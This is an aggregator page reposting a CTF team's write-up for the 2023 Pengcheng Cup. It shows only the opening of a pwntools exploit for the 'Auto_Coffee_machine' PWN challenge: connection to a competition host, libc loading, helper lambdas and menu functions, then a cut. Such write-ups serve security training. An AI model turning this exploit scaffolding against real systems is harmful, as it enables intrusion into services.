注册    登录
看啥推荐读物
专栏名称: 星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
今天看啥  ›  专栏  ›  星盟安全

2023 鹏城杯WP

星盟安全  · 公众号  ·  · 2023-11-23 15:49
1PWNAuto_Coffee_machineEXPfrom pwn import *context.log_level = 'debug'p = remote('172.10.0.9',8888)libc = ELF('./libc-2.31.so')def d():    gdb.attach(p)s = lambda data : p.send(data)sa  = lambda text,data  :p.sendafter(text, data)sl  = lambda data   :p.sendline(data)sla = lambda text,data  :p.sendlineafter(text, data)r   = lambda num=4096   :p.recv(num)rl  = lambda text   :p.recvuntil(text)pr = lambda num=4096 :print(p.recv(num))inter   = lambda        :p.interactive()l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))int16   = lambda data   :int(data,16)def buy(idx,data = b'A'*8):        sla(b'>>>', b'1')        sla(b'buy', str(idx))        sla(b'N', b'y')        sa(b'coffee', data)def show():        sla(b'>>>', b'2')def login1(idx,offset,data):        s ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
推荐文章
财宝宝  ·  -20240513094533
昨天
真叫卢俊  ·  没想到杭州业主自己下场搞原拆原建了
昨天
财宝宝  ·  菜菜,西南二线城市,加盟快捷酒店,怎么样?您手头有做这个的实例吗-20240511154257
3 天前
财宝宝  ·  为什么中介是风口? 马爸爸是干什么的?大中介。他既-20240510160059
4 天前
财宝宝  ·  对于二线城市来说,放不放开,本质上是抢人抢资金大战。 -20240509140358
5 天前
伯益说  ·  分享:《特别管控危险化学品目录(第一版)》 2020年版
1 年前
植物前沿  ·  不是所有绿植都适合养在卧室,快对照看看!
1 年前
中国军网  ·  中共中央政治局召开会议 习近平主持
3 年前
东吴双碳环保研究  ·  【东吴环保袁理团队】每日锦集0617:河北垃圾焚烧中长期规划第一次环评公示
4 年前
体育蓝皮书  ·  人民日报:让体育为奋斗的时代增光添彩
5 年前
关于   移动版   ·   Py中国   ·   RSS之家   ·   codingpro   ·   Code   ·   link之家   ·   卧龙AI搜索   ·   藏经阁   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号